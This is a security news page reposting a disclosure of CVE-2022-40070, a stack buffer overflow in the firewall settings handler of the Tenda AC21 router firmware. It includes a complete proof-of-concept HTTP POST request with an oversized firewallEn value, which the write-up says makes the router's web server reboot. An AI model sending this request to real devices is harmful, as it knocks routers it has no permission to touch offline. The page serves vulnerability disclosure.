Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-40070: Vuln/Tenda AC21/8 at main · xxy1126/Vuln

Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via bin/httpd, function: formSetFirewallCfg.

CVE
Open in Source
#vulnerability#web#mac#windows#apple#buffer_overflow#chrome#webkit

Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview

  • Manufacturer’s website information:https://www.tenda.com.cn/
  • Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

product information

Tenda A21(V16.03.08.15), latest version of simulation overview:

description****1. Vulnerability Details

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionformSetFirewallCfg

Attackers can cause this vulnerability via parameter firewallEn

It copies s to v4 which is on the stack, so there is a stack overflow vulnerability.

2. Recurring loopholes and POC

In order to reproduce the vulnerability, the following steps can be followed:

  1. Boot the firmware by qemu-system or other ways (real machine)

  2. Attack with the following POC attacks

    POST /goform/SetFirewallCfg HTTP/1.1 Host: 192.168.0.1 Content-Length: 1364 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.0.1 Referer: http://192.168.0.1/main.html Accept-Encoding: gzip, deflate Accept-Language: en,zh-CN;q=0.9,zh;q=0.8 Cookie: password=25d55ad283aa400af464c76d713c07adamlcvb Connection: close

    firewallEn=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

By sending this poc, we can makehttpd reboot

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE